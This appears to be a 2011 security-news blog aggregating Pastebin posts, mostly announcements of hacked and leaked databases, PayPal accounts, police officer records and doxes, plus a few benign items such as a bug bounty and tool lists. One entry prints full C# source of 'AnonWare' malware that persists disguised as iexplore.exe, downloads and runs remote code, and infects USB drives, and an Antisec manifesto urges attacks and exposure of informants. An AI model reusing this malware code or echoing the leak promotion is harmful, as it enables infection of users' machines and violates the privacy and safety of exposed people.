The Cable Co. Logins - Pastebin.com: "Website: http://www.thecableco.com/
Database: tcc_live
Table: tcc_customers

SQLi'ed by: Santa for Lmfaox."

http://pastebin.com/3YcCJCjX

musicbizpro hacked db Leaked !

2011-08-02T00:30:00.001+05:30

musicbizpro hacked! - Pastebin.com: "The weekend doesn't end there mate! Following is the data base of musicbizpro, India (www.musicbizpro.com). Coming days will be marked with more mayhem. Stay tuned on @ThEhAcKer12.

By
ThEhAcKeR12"

http://pastebin.com/Q0X9dL4B

12000 SQLi sites leaked !

2011-08-02T00:28:00.001+05:30

============================================================================================
By
The
The Snake
thesnake.zxq.net
============================================================================================

12,000 websites SQLi

http://pastebin.com/GYNVsR1W

PCS Consultants govt hacked db leaked !

2011-08-02T00:25:00.001+05:30

PCS Consultants (Government Contractor) hacked! - Pastebin.com: "Following is the Data Base of PCS Consultants (USA) (https://pcs-consultants.com). This company is a Government contractor & had worked for many Departments (Check https://pcs-consultants.com/government-contractors.php).

By
ThEhAcKeR12
@ThEhAcKeR12"

http://pastebin.com/NhGesqFF

Operation Indonesia database leaked !

2011-08-02T00:15:00.001+05:30

_ _ ____ _____ _ _
_| || |_ / __ \ |_ _| | | (_)
|_ __ _| | | |_ __ | | _ __ __| | ___ _ __ ___ ___ _ __ _
_| || |_| | | | '_ \ | | | '_ \ / _` |/ _ \| '_ \ / _ | __| |/ _` |
|_ __ _| |__| | |_) |_| |_| | | | (_| | (_) | | | | __|__ \ | (_| |
|_||_| \____/| .__/|_____|_| |_|\__,_|\___/|_| |_|\___|___/_|\__,_|
| |
|_|

.--. .-. .--. .--.
; _ \ / \ (_ | (_ |
(___)` | | .-. ; | | | |
' ' | | | | | | | |
/ / | | | | | | | |
/ / | | | | | | | |
/ / | ' | | | | | |
/ '____ ' `-' / | | | |
(_______) `.__,' (___) (___)

-----------------------------------------------------------------------------------------------------------
#antisec - #opindonesia - #anonops - #onslaught
Episode : Tea Party the appetizer
-----------------------------------------------------------------------------------------------------------

Hello thar!

Today, we want to invite all of the ship's passengers to have a tea party. We have cooked some delicious cake today!
For the appetizer we'll more then 60 Mb of cvs, more than 20k of records to consume, fresh from the Indonesian Ministry of Health. And for the main course we will serve something special, more than 30k records of data to devour freshly dumped from kominfo ranch.. drooling?

Let's eat!

The ship's passengers, of which many are Indonesians, might want to thank #kominfo @tifsembiring @iwansumantri @patakaid #idsirtii who supplied all the delicious ingredients which made the amazing cake we'll enjoy at our party.

Damn you!, We have Google! Ergo, mind your manners! We've heard what you've been saying...
For the next kaffeklatch, we will serve some delicasies such as #oplapindo, #opprita and #opnazarrudin! Get your utensils! A shoutout to all friendly vessels: Always remember, we don't forgive! We're anchoring some ships on the beautiful straits of Mallaca for a while.

Prita Mulyasari - Nevar Forget. http://bit.ly/7MiOl5

Appetizer Menu, Indonesian Ministry of Health Databases,Sisfo Kepegawaian Kemenkes (Officer Databases of Indonesian Ministry of Health), Sisfo Kepegawaian Daerah, Sisfo Layanan Kepegawaian

http://pastebin.com/SUVk0jMC

Sabu Lulzsec higschool drama

2011-08-02T00:12:00.001+05:30

;;;; ;; ;;;;; ; ; ; ;;;;; ;;;;;;
; ; ; ; ; ; ; ; ; ; ;
;;;; ; ; ;;;;; ; ; ; ; ; ;;;;; ;;;;;
; ;;;;;; ; ; ; ; ; ;;;;; ;
; ; ; ; ; ; ; ; ; ; ;
;;;; ; ; ;;;;; ;;;; ; ; ;;;;;;

Tue Aug 14 19:10:38 2001
"American school security... eh?"
by Sabu.

To start off, yes. Yes? yes. Just answering your question. What
question?, oh.. "will this silly american b* about U.S.A's B.o.E/S.S?" yes.

In this writing, I will give you hopefully a sense of how average
Urban school "Security" systems operate. Arrogance, Ignorance, and possibly
Mental Inferiority problems are the average Urban school "Security" systems
default functions. I've lived in the Suburbs and in Urban areas. It is quite
logical which area would have a better School Security Operation. So, I will
ignore Suburban School Operation for now. I will now proceed with my story.

http://pastebin.com/V8wPcdTf

Florida voting system Hacked Leaked !

2011-08-02T00:09:00.002+05:30

"Below are the inside details of Florida voting systems. If the United States government can't even keep their ballot systems secure, why trust them at all? Everyone knows voting is rigged, but if you don't here you go."

##############
# voterstats #
##############

category,id,pdf,title
---------------------

http://pastebin.com/Bz59q7Gj

1296 PayPal Accounts Leaked pakhaxorz !

2011-08-02T00:07:00.001+05:30

1296 Hacked PayPal Accounts - Pastebin.com: "Freshly hacked PayPal accounts 7/31/11

Curtsey of pakhaxorz

Download: http://bit.ly/q1YyrN

Enjoy brothers :)

http://pastebin.com/XvMRHxsY

Alert: Check if you got your's leaked, change the pass/sec questions (if any ).

Gawker Huge Hack Leak Antisec !

2011-08-02T00:04:00.001+05:30

___________________________________________________________________________
.' `.
| .o .o .oooooo. o8o |
| .8' .8' d8P' `Y8b `"' |
| .888888888888' 888 ooo. .oo. .ooooo. .oooo.o oooo .oooo.o |
| .8' .8' 888 `888P"Y88b d88' `88b d88( "8 `888 d88( "8 |
|.888888888888' 888 ooooo 888 888 888 888 `"Y88b. 888 `"Y88b. |
| .8' .8' `88. .88' 888 888 888 888 o. )88b 888 o. )88b |
| .8' .8' `Y8bood8P' o888o o888o `Y8bod8P' 8""888P' o888o 8""888P' |
| |
| Where is your god now!?!? |
`-----------------------------------------------------------------------------'

So, here we are again with a monster release of ownage and data droppage.
Previous attacks against the target were mocked, so we came along and raised the bar a little.
F** you gawker, hows this for "script kids"?
Your empire has been compromised, Your servers, Your database's, Online accounts and source
code have all be ripped to shreds!
You wanted attention, well guess what, You've got it now!

[0x01] Primary Targets!
[0x02] Pissing on the campfire
[0x03] 1.3 Million users DB.
[0x04] Server Information
[0x05] RIP Gawker!

__ __ __
_____________|__| _____ _____ _______ ___.__. _/ |______ _______ ____ _____/ |_ ______
\____ \_ __ \ |/ \\__ \\_ __ < | | \ __\__ \\_ __ \/ ___\_/ __ \ __\/ ___/
| |_> > | \/ | Y Y \/ __ \| | \/\___ | | | / __ \| | \/ /_/ > ___/| | \___ \
| __/|__| |__|__|_| (____ /__| / ____| |__| (____ /__| \___ / \___ >__| /____ >
|__| \/ \/ \/ \/ /_____/ \/ \/


http://pastebin.com/VwUQhbQi

CNAIPIC Hack Part 4

2011-08-02T00:00:00.001+05:30

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
_____ ______
| | \ _ \ _____ \______\
| | / /_\ \\__ \ | | \
| |__\ \_/ \/ __ \_| ` \
|_______ \_____ (____ /_______ /
\/ \/ \/ \/

+Legion of Anonymous Doom+ Release ZeroIII+
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Heynow,

Our special message is dedicated to our friends at CNAIPIC who still deny being ripped off for some great stuff to own. To all of you federali who locked our pastebin accounts we say Hi by releasing this one.
Next time we go after you and your National Crime Information Center along with VICAP database and your f'd up affiliate lexis nexis - so you f*d!
We promisse you that.
Well tagliatelitti pomodori pastas poon! we are to strike back with great vengence and furious anger, those who attempt to poison and destroy our brothers, and you will know Our name is the LAW when we lay our vengeance upong of thee.
Since you were gathering intel in indian , ukraine and belorussian consulates we want to show you first- stuff you gathered from the voicemail system of Indian consulate in Paris, also some of your own documents you are still denying any relation to and you'll be very hard retaliated with we bet your a* on that one.
And for the taste of things to come some of the Ukrainian - Belarus stuff to think about. So here you go with 4th CNAIPIC leak release is called:
"Cnaipic- your A** invaders are back - Now know we Truth"

Watch for your big plasma screen over there since we provide our fellaz with the chart of your video system

http://imgur.com/a/YHhOK
http://www.filefactory.com/file/c1a317f/n/CNAIPIC4N.rar - release archive

Our links to locked by FEDS acccounts:

1st release http://pastebin.com/r21cExeP
2nd release http://pastebin.com/3E7UPduL
3rd release http://pastebin.com/jYyicJ8M

Tah tah p*

Now we want to thank all our brothers who doing time and who r outside committed to IDEA...
We r with you and stay cold,
Now Know We Truth
Ass invaders are back :)

http://pastebin.com/hajHVdhV

Antisec vs Law Enforcement !

2011-08-01T23:56:00.004+05:30

`..--.
`:.#antisec#;:
:antisec#anti;+.`
:sec#antisec#a;/:
ntisec#antisec#+a
.ntisec#antisec;:
`-` +#antisec#anti:s/
/.:+:/+.`..` `;+;ec#antisec::+
:.;;+`-./-:` .+:#antisec#anti-++`
`-` -:.``; `:.+.sec#antisec#a: -;-
`; -:::. `-:+..;/:ntisec#an.-` :+``+-
`.+- `./;.- `-/++++:`.:-;tisec#anti++ -s;`/;//-
`-:` .-:- /::+-` :/+;ec#ant;i;/.. ;s:.;:++.:
`/ .:` `;:/` .+..+///:::/:. /:e;c#a:;/+-`
`:+.. .. .:.;n+/++. `---...```` `tisec#an:/:++-
-::-` `.--` -t:./;:ise./.`.. .:+.;;c#antisec#:.;;
+- .::.` .;:.;antisec;.+;;+` .--:;..:.#;antisec;;/
`.` `++-` ./;;#antisec#a;:nt;i+.` ` ;. `-;sec#an:.`
.:. .;-` t+.isec#;a:;:;;nt;i+::.-`` ..:-` .. .;sec#a+:.
--::...; ..;ntise+c;:-` :;.-`:++.+//:- `/ `;#ant;+:
./:::.: +::isec;#. `an.. .-/.; -tisec/
`.+.::/``/+:#an:;. .ti+` `./;;:`;+ sec#.+`
/anti:;..sec#; .an. `-+.;+::.-.. ti;+:`:;`
/sec#antise/c `#a- ``-;..//+.+:.-. -ntis:::/;
ec#antisec#:+ /a. ////+//./..+++..` `;nti./:`:`
`sec#antisec#/ /;:+///...+:/.//;;;:././+- `;ant+/;`
isec#antis;. `;ec#antisec#antisec#ant:.:;;. :/:-`
isec#antis: -;ec#antisec#antisec#anti;.- .;/
/sec#antise/ c#antisec#antisec#antis.:-` .
/;;ec#an::. tise.`
`+.c#..+` ;+-.;`
`:/:

"I'll throw a molotov cocktail at the precinct, You know how we think..."

////////////////////////////////////////////////////////////////////////////////
_ _ __ .__
__| || |__ _____ _____/ |_|__| ______ ____ ____ #anonymous
\ __ / \__ \ / \ __\ |/ ___// __ \_/ ___\ #antisec
| || | / __ \| | \ | | |\___ \\ ___/\ \___ #lulzsec
/_ ~~ _\ (____ /___| /__| |__/____ >\___ >\___ > #f*thepolice
|_||_| \/ \/ \/ \/ \/ #freemercedes

ANTISEC DESTROYS SEVERAL DOZEN LAW ENFORCEMENT WEBSITES, PROMISES MASSIVE LEAK

////////////////////////////////////////////////////////////////////////////////

Time for us to conduct a raid of our own.

In retaliation to the unjust persecution of dozens of suspected Anonymous
"members", we attacked over 70 US law enforcement institutions defacing their
websites and destroying their servers. Additionally, we have stolen massive
amounts of confidential documents and personal information including email
spools, password dumps, classified documents, internal training files, informant
lists, and more to be released very soon. We demand prosecuters immediately drop
all charges and investigations against all "Anonymous" defendants.

The 10GB of private law enforcement data contains:
* The mail spools of police officers from dozens of different PDs
* Usernames, passwords, social security numbers, home addresses and phone
numbers to over 7000 officers
* A list of hundreds of snitches who made "anonymous" crime tips to the police
* Hundreds of internal police academy training files

The leaked data also contained jail inmate databases and active warrant
information but we are we redacting the name/address info to demonstrate how
those facing the gun of the criminal injustice system are our comrades and not
our adversaries. On the other hand, we will be making public name and contact
information about informants who had the false impression that they would be
able to "anonymously" snitch in secrecy.

To law enforcement: your bogus trumped-up charges against the Anonymous paypal
LOIC attacks will not stick, nor will your intimidation tactics stop us from
exposing your corruption. While many of the recent "Anonymous" arrestees are
completely innocent, there is no such thing as an innocent cop, and we will act
accordingly.

To our hacker comrades: now is the time to unite and fight back against our
common oppressors. Escalate attacks against goverment, corporate, law
enforcement and military targets: destroy their systems and leak their private
data.

In our fight for a world free from police, prisons and politicians, we will
continue to expose their corruption and destroy their systems. Remember there
are more of us than there are of them, and they can never stop us all.

Solidarity means Attack!

"The day will come when our silence will be more powerful than the voices
you are throttling today." - August Spies, Anarchist Haymarket Martyr

////////////////////////////////////////////////////////////////////////////////

http://www.baxterbulletin.com/article/20110727/NEWS01/110727004/BREAKING-NEWS-
Sheriff-says-website-should-back-up-soon-reports-FBI-hacking-investigation-
unconfirmed?odyssey=nav|head

"Sheriff John Montgomery says the server for the sheriff's website was shut down
Tuesday. He also says he doesnâ€™t have any specific information about a hacking
incident, but that heâ€™s not too troubled about any alleged security breach."

YEAH WE OWNED YOUR NEW SERVER TOO! SHOULDA EXPECTED US ... HACKLOG COMING SOON!!

////////////////////////////////////////////////////////////////////////////////

Over 70 US law enforcement institutions were attacked including:

20jdpa.com, adamscosheriff.org, admin.mostwantedwebsites.net,
alabamasheriffs.com, arkansassheriffsassociation.com,
bakercountysheriffoffice.org, barrycountysheriff.com, baxtercountysheriff.com,
baxtercountysherifffoundation.org, boonecountyar.com, boonesheriff.com,
cameronso.org, capecountysheriff.org, cherokeecountyalsheriff.com,
cityofgassville.org, cityofwynne.com, cleburnecountysheriff.com,
coahomacountysheriff.com, crosscountyar.org, crosscountysheriff.org,
drewcountysheriff.com, faoret.com, floydcountysheriff.org, fultoncountyso.org,
georgecountymssheriff.com, grantcountyar.com, grantcountysheriff-collector.com,
hodgemansheriff.us, hotspringcountysheriff.com, howardcountysheriffar.com,
izardcountyar.org, izardcountysheriff.org, izardhometownhealth.com,
jacksonsheriff.org, jeffersoncountykssheriff.com, jeffersoncountyms.gov,
jocomosheriff.org, johnsoncosheriff.com, jonesso.com, kansassheriffs.org,
kempercountysheriff.com, knoxcountysheriffil.com, lawrencecosheriff.com,
lcsdmo.com, marioncountysheriffar.com, marionsoal.com, mcminncountysheriff.com,
meriwethercountysheriff.org, monroecountysheriffar.com, mosheriffs.com,
mostwantedgovernmentwebsites.com, mostwantedwebsites.net,
newtoncountysheriff.org, perrycountysheriffar.org, plymouthcountysheriff.com,
poalac.org, polkcountymosheriff.org, prairiecountysheriff.org,
prattcountysheriff.com, prentisscountymssheriff.com, randolphcountysheriff.org,
rcpi-ca.org, scsosheriff.org, sebastiancountysheriff.com, sgcso.com,
sharpcountysheriff.com, sheriffcomanche.com, stfranciscountyar.org,
stfranciscountysheriff.org, stonecountymosheriff.com, stonecountysheriff.com,
talladegasheriff.org, tatecountysheriff.com, tishomingocountysheriff.com,
tunicamssheriff.com, vbcso.com, woodsonsheriff.com

////////////////////////////////////////////////////////////////////////////////

http://pastebin.com/iwnA90E6

List of SSL Scanners

2011-08-01T23:31:00.001+05:30

List of SSL Scanners for Penetration Testers! — PenTestIT: "In simpler words, it means that SSL creates a secure connection between two endpoints, over which any amount of data can be securely sent. It is mostly used with web applications that need trust to be established between the client and the server – mostly applications that handle financial data. So you see it is of utmost importance to see that your or your customers SSL implementation is safe to use and does not leak any information. This is a list of tools we compiled that will help you do just that. We will try to restrict them only to open source and free tools:"

http://www.pentestit.com/2011/08/01/list-ssl-https-scanning-tools-penetration-testers/

Incident Response Operating System

2011-08-01T23:30:00.001+05:30

Journey Into Incident Response: Obtaining Information about the Operating System: "When I approach an analysis I perform the same initial steps to shed light on the system under examination. The first step is to review the master boot record and the second step is to obtain general information about the operating system and its configuration. The impact of the information on a digital forensic analysis can be significant."

http://journeyintoir.blogspot.com/2011/07/obtaining-information-about-operating.html

Black Hat 2011 hacks !

2011-08-01T23:28:00.001+05:30

Black Hat: 10 can't-miss hacks and presentations | ZDNet: "LAS VEGAS — The 2011 Black Hat security conference is promising a smorgasbord of (in)security fun. From vulnerabilities in PLCs (programmable logic controllers) to the security design of Apple’s iOS and potential hacker attacks on medical implant devices, the range of presentations this year could be the best ever."

http://www.zdnet.com/blog/security/black-hat-10-cant-miss-hacks-and-presentations/9132

Metasploit 4.0 Released!

2011-08-01T23:26:00.001+05:30

Rapid7 Community: Metasploit: Metasploit Framework 4.0 Released!: "It's been a long road to 4.0. The first 3.0 release was almost 5 years ago and the first release under the Rapid7 banner was almost 2 years ago. Since then, Metasploit has really spread its wings. When 3.0 was released, it was under a EULA-like license with specific restrictions against using it in commercial products. Over time, the reasons for that decision became less important and the need for more flexibility came to the fore; in 2008, we released Metasploit 3.2 under a 3-clause BSD license. Licensing is definitely not the only place Metasploit's fexibility has increased. Over the last 5 years, we've added support for myriad exploitation techniques, network protocols, automation capabilities, and even user interfaces. The venerable msfweb is gone along with the old gtk-based msfgui. Taking their place are the newer java-based msfgui and armitage, both of which have improved by leaps and bounds since their respective introductions."

https://community.rapid7.com/community/metasploit/blog/2011/08/01/metasploit-40-released

http://updates.metasploit.com/data/releases/framework-4.0.0-windows-mini.exe

http://updates.metasploit.com/data/releases/framework-4.0.0-windows-full.exe

http://updates.metasploit.com/data/releases/framework-4.0.0-linux-mini.run

http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run

http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2

Anonware malware framework

2011-08-01T15:51:00.001+05:30

download complete everything @ http://www.megaupload.com/?d=QKMY6HRW

pleasepleaseplease like, tweet, etc. so we can get moarmoarmoar ppl working on this!
only one developer is pretty sad :( if you know C#, or wanna help convert this code into java, C, C++, etc,
pleeeease contact opendev@hushmail.com!!

///first, a little introduction might be neccessary!
///welcome to a new age of malware.
///one where AV software can't pick out the latest tweaks of malware
///one where the malware is open source and always chainging, improving, evading
///one where AnonWare is only the begining.
///you can stop anonware. but you can't stop what's to come.
///Expect Us. Expect the Future.
///~AnonDev
///PS: this is just a framework; not supposed to be a full-fledged virus just yet ^_^ add your own code onto this and send the result to opendev@hushmail.com
///kthx

Program.cs contents:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.CSharp;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Management;
using System.Threading;
using System.CodeDom.Compiler;
using System.Net;
using System.IO;

namespace AnonWare_CSharp
{
class Program
{
static void Main()
{
string appdatapath = Environment.GetEnvironmentVariable("appdata").ToString();
//when it starts, app checks whether or not it's set to run on startup
if (File.Exists(appdatapath + @"\Microsoft\Windows\Start Menu\Programs\Startup\iexplore.exe")) //we're using iexplore.exe as our fake identity :P check in Properties -> assembly name 2 change it. keep in mind that XP might have a different startup folder than then Win 7 and Vista. this is the path for 7 and vista startup folder
{
}
else
{
//if it isn't, do this
File.Copy(AppDomain.CurrentDomain.FriendlyName.ToString(), appdatapath + @"\Microsoft\Windows\Start Menu\Programs\Startup\iexplore.exe");
}
}
public static string watsdasource;
static void compile()
{
//we're using runtime compilation instead of just downloading an exe to go around the whole program is not signed by msft shit
try
{
CSharpCodeProvider myCodeProvider = new CSharpCodeProvider();
ICodeCompiler myCodeCompiler = myCodeProvider.CreateCompiler();
String[] referenceAssemblies = { "System.dll" }; //if you plan to do more than really simple stuff with it, add stuff to this list (seperate them with commas)
string myAssemblyName = "assemble.exe";
CompilerParameters myCompilerParameters = new CompilerParameters(referenceAssemblies, myAssemblyName);
myCompilerParameters.GenerateExecutable = true;
myCompilerParameters.GenerateInMemory = true;
WebClient x = new WebClient();
Stream y = x.OpenRead("http://sumsite.com/sumfile.txt"); //link to txt file containing source code (nothing matters except that it's a text file, name it anything you want)
StreamReader z = new StreamReader(y);
string source = z.ReadToEnd();
if (source != watsdasource)
{
watsdasource = source;
z.Close();
y.Close();
CompilerResults compres = myCodeCompiler.CompileAssemblyFromSource(myCompilerParameters, source);
Process.Start("assemble.exe"); //for AV purposes, it's recommended that you change the name of this, or even make the name self-creating (see 'for all your randomness needs' below) ^_^
}
else
{
z.Close();
y.Close();
}
}
catch
{
//uh oh...
}
}
//for all your randomness needs! ^_^
public static string GetPassword()
{
StringBuilder builder = new StringBuilder();
builder.Append(RandomString(4, true));
builder.Append(RandomNumber(1000, 9999));
builder.Append(RandomString(2, false));
return builder.ToString();
}
private static int RandomNumber(int min, int max)
{
Random random = new Random();
return random.Next(min, max);
}
private static string RandomString(int size, bool lowerCase)
{
StringBuilder builder = new StringBuilder();
Random random = new Random();
char ch;
for (int i = 0; i < size; i++)
{
ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65)));
builder.Append(ch);
}
if (lowerCase)
return builder.ToString().ToLower();
return builder.ToString();
}
}
}

reproduction.cs contents:

///reproduction.cs contains some nice, but still not near finished, code that turns AnonWare into a virus ^_^
///check thru psuedocode for more info :P
///TODO:
///intercept exe files before they're uploaded, compressed, or downloaded.
///instead of using a fake directory, actually copy the exe into the new wrapper ^^_^^
///spread thru la world!

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.CSharp;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Management;
using System.Threading;
using System.CodeDom.Compiler;
using System.Net;
using System.IO;

namespace AnonWare_CSharp
{
class reproduction
{
public void reproduce()
{
Properties.Settings.Default.filename = GetPassword() + ".exe";
Properties.Settings.Default.Save();
string fname = Properties.Settings.Default.filename;
File.Copy(AppDomain.CurrentDomain.FriendlyName.ToString(), Properties.Settings.Default.filename);
}
public void usbinject()
{
///
///foreach [program] x in [directory] y
///{
///MOVE PROGRAMS INTO GetPassword including the CHILD
///CREATE COMPILER
///string source = "yadayda" + GetPassword\filename.exe + "moaryada" + GetPassword\Settings.Default.filename + "even MOAR yadyada";
///COMPILE & PLACE IN PLACE OF ORIGINAL EXE
///}
///
if(Directory.Exists(@"F:\"))
{
if (GetDirectorySize(@"F:\") < 20000000.00 & GetDirectorySize(@"F:\") != 0) //i *think* that means 20 MB... it would really sux if it meant 20 GB or 20 KB xD
{
INJECT(@"F:\");
}
}
if (Directory.Exists(@"G:\"))
{
if (GetDirectorySize(@"G:\") < 20000000.00 & GetDirectorySize(@"G:\") != 0)
{
INJECT(@"G:\");
}
}
if (Directory.Exists(@"H:\"))
{
if (GetDirectorySize(@"H:\") < 20000000.00 & GetDirectorySize(@"H:\") != 0)
{
INJECT(@"H:\");
}
}
if (Directory.Exists(@"I:\"))
{
if (GetDirectorySize(@"I:\") < 20000000.00 & GetDirectorySize(@"I:\") != 0)
{
INJECT(@"I:\");
}
}
if (Directory.Exists(@"J:\"))
{
if (GetDirectorySize(@"J:\") < 20000000.00 & GetDirectorySize(@"J:\") != 0)
{
INJECT(@"J:\");
}
}
if (Directory.Exists(@"Z:\"))
{
if (GetDirectorySize(@"Z:\") < 20000000.00 & GetDirectorySize(@"Z:\") != 0)
{
INJECT(@"Z:\");
}
}
if (Directory.Exists(@"D:\"))
{
if (GetDirectorySize(@"D:\") < 20000000.00 & GetDirectorySize(@"D:\") != 0)
{
INJECT(@"D:\");
}
}
}
private void INJECT(string directorytoinject)
{
try
{
string[] directorys = Directory.GetDirectories(directorytoinject);
foreach (string dr in directorys)
{
if (File.Exists(dr + "info.aw"))
{
//It's ALIVE!
}
}
string[] a = Directory.GetFiles(directorytoinject, "*.exe");
string direct = directorytoinject + GetPassword();
Directory.CreateDirectory(direct);
string[] new1 = Properties.Settings.Default.filename.Split('.');
string de1 = direct + @"\" + new1[0] + "anonwr.exe";
File.Copy(Properties.Settings.Default.filename, de1);
File.Copy(Properties.Settings.Default.filename, direct + @"\" + Properties.Settings.Default.filename);
foreach (string nm in a)
{
string newName = GetPassword() + ".exe";
string Direct = direct + @"\" + newName;
File.Move(nm, Direct);
CSharpCodeProvider myCodeProvider = new CSharpCodeProvider();
ICodeCompiler myCodeCompiler = myCodeProvider.CreateCompiler();
String[] referenceAssemblies = { "System.dll" };
string myAssemblyName = nm;
CompilerParameters myCompilerParameters = new CompilerParameters(referenceAssemblies, myAssemblyName);
myCompilerParameters.GenerateExecutable = true;
myCompilerParameters.GenerateInMemory = false;
string direct2 = direct + "\\" + Properties.Settings.Default.filename;
string source = "using System; using System.Diagnostics; namespace anonwarebooter { class Program { static void Main(string[] args) { try { Process cmd = new Process(); string ags = \"/C " + Direct.Replace("\\", "\\\\") + "\"; cmd.StartInfo.FileName = \"cmd\"; cmd.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; cmd.StartInfo.Arguments = ags; cmd.Start(); Process cmd2 = new Process(); string ags2 = \"/C " + de1.Replace("\\", "\\\\") + "\"; cmd2.StartInfo.FileName = \"cmd\"; cmd2.StartInfo.Arguments = ags2; cmd2.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; cmd2.Start(); } catch { } } } }";
CompilerResults compres = myCodeCompiler.CompileAssemblyFromSource(myCompilerParameters, source);
}
}
catch
{
}
}
static long GetDirectorySize(string p)
{
// 1
// Get array of all file names.
string[] a = Directory.GetFiles(p, "*.exe");

// 2
// Calculate total bytes of all files in a loop.
long b = 0;
foreach (string name in a)
{
// 3
// Use FileInfo to get length of each file.
FileInfo info = new FileInfo(name);
b += info.Length;
}
// 4
// Return total size
return b;
}
public string GetPassword()
{
StringBuilder builder = new StringBuilder();
builder.Append(RandomString(4, true));
builder.Append(RandomNumber(1000, 9999));
builder.Append(RandomString(2, false));
return builder.ToString();
}
private int RandomNumber(int min, int max)
{
Random random = new Random();
return random.Next(min, max);
}
private string RandomString(int size, bool lowerCase)
{
StringBuilder builder = new StringBuilder();
Random random = new Random();
char ch;
for (int i = 0; i < size; i++)
{
ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65)));
builder.Append(ch);
}
if (lowerCase)
return builder.ToString().ToLower();
return builder.ToString();
}
}
}

opendev@hushmail.com
source:
http://pastebin.com/MFc4SY3S

Mass hack alert exero.eu catalog jquery.js spyeye blackhole exploit kit !

2011-07-31T23:47:00.003+05:30

As per Google search results, looks like 160,000 site have been compromised recently (Spyeye & Black hole Exploit kit) :

Search Query: exero.eu/catalog/jquery.js

http://www.google.com/#sclient=psy&hl=en&source=hp&q=exero.eu%2Fcatalog%2Fjquery.js&pbx=1&oq=exero.eu%2Fcatalog%2Fjquery.js&aq=f&aqi=&aql=&gs_sm=e&gs_upl=159671l161644l0l161902l2l2l0l0l0l0l263l482l2-2l2l0&bav=on.2,or.r_gc.r_pw.&fp=b8901692fe56d969&biw=1366&bih=643

source:

http://www.malwaredomainlist.com/mdl.php?search=2011/07/31_17:35&colsearch=All&quantity=50&inactive=on

Hacking IPv6 Network

2011-07-31T01:15:00.001+05:30

Microsoft PowerPoint - fgont-hip2011-hacking-ipv6-networks.ppt - Powered by Google Docs:

"We've uploaded the slides used during part of our training "Hacking IPv6
Networks" at the Hack in Paris 2011 Conference.They contain quite a few insights about IPv6 security, along with a number of practical examples."

Introduction to IPv6
Provide an objetive discussion of IPv6 security issues
Identify and analyze a number of security aspects that must be
considered before deploying IPv6
Identify an analyze the security implications of IPv6 on IPv4 networks
Identify areas in which further work is needed
Draw some conclusions regarding IPv6 security"

Online:

http://docs.google.com/viewer?a=v&pid=sites&srcid=ZGVmYXVsdGRvbWFpbnxoYWNraW5naXB2Nm5ldHdvcmtzfGd4OjM4NjU1YjM0NDRjN2UzMzI

Download:

http://www.hackingipv6networks.com/past-trainings/hip2011-hacking-ipv6-networks.pdf?attredirects=0&d=1

Skype DoS

2011-07-31T01:08:00.000+05:30

http://seclists.org/fulldisclosure/2011/Jul/341

Google URL redirection !

2011-07-31T01:03:00.001+05:30

=======================================================================
Google.com - Open Redirect
=======================================================================

Affected Software : Google.com domain
Severity : Low
Local/Remote : Remote
Author : Piotr Duszynski (@drk1wi)

[Summary]

Due to a domain filtering bug and the way Chrome and Safari browsers
are interpreting the '%2e' URL encoded char it is possible to
trigger an open redirection through the Google main domain.

[Vulnerability Details]

This vulnerability* has been verified on Chrome and Safari latest
browsers.

HTTP GET request:

http://www.google.com/sorry/?continue=http://google.wp%252epl

HTTP response body:

HTTP/1.0 302 Moved Temporarily
Location:
http://www.google.wp%2epl/sorry/?continue=http://google.wp%252epl

The fact that the %2e is interpreted as a '.' within the address bar,
allows to trigger an open redirect.

http://permalink.gmane.org/gmane.comp.security.full-disclosure/80856

Facebook Bug Bounty !

2011-07-30T23:36:00.001+05:30

Facebook (3): "

To show our appreciation for our security researchers, we offer a monetary bounty for certain qualifying security bugs. Here's how it works:
Eligibility
To qualify for a bounty, you must:

Adhere to our Responsible Disclosure Policy:

... give us a reasonable time to respond to your report before making any information public and make a good faith effort to avoid privacy violations, destruction of data and interruption or degradation of our service during your research ...
Be the first person to responsibly disclose the bug
Report a bug that could compromise the integrity or privacy of Facebook user data, such as:
Cross-Site Scripting (XSS)
Cross-Site Request Forgery (CSRF/XSRF)
Remote Code Injection
Reside in a country not under any current U.S. Sanctions (e.g., North Korea, Libya, Cuba, etc.)
Our security team will assess each bug to determine if qualifies.
Rewards
A typical bounty is $500 USD
We may increase the reward for specific bugs
Only 1 bounty per security bug will be awarded
Exclusions
The following bugs aren't eligible for a bounty (and we don't recommend testing for these):
Security bugs in third-party applications (e.g., http://apps.facebook.com/[app_name])
Security bugs in third-party websites that integrate with Facebook
Security bugs in Facebook's corporate infrastructure
Denial of Service Vulnerabilities
Spam or Social Engineering techniques"

http://www.facebook.com/whitehat/bounty/

Cyb3rSec Crew Malaysian Crew

2011-07-30T22:33:00.001+05:30

Cyb3rSec Crew | Malaysian Crew http://seminars.com.sg/ - Pastebin.com: "Cyb3rSec Crew | Malaysian Crew

.: We Not Alone :.
.: We Know To Find :.
.: We are Cyb3r S3cur!t7 Cr3w :.
.: Hacking Just To Learn :.

https://www.facebook.com/pages/Cyb3rSeC-Crew-Malaysian-Crew/207390472645570

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

TARGET
http://seminars.com.sg/
++++++++++++++++++++++++++++++++++++++++"

http://pastebin.com/NgY8eZhz

Operation Orlando DOX

2011-07-30T22:31:00.001+05:30

Operation Orlando DOX - Pastebin.com: "Hai, this is a dox from Operation Orlando."

http://pastebin.com/sX4TAdG2

dox Federal Reserve Board of Governors

2011-07-30T22:28:00.000+05:30

d0x of the Federal Reserve Board of Governors - Pastebin.com: "d0x of Federal Reserve Board of Governors"

http://pastebin.com/jKRQzuxY

Hacked Miss Scotland 2011

2011-07-30T22:26:00.001+05:30

The Sun - Hacked Miss Scotland 2011 - Pastebin.com: "The Sun - Excerpt of Miss Scotland's 2011 contestants.

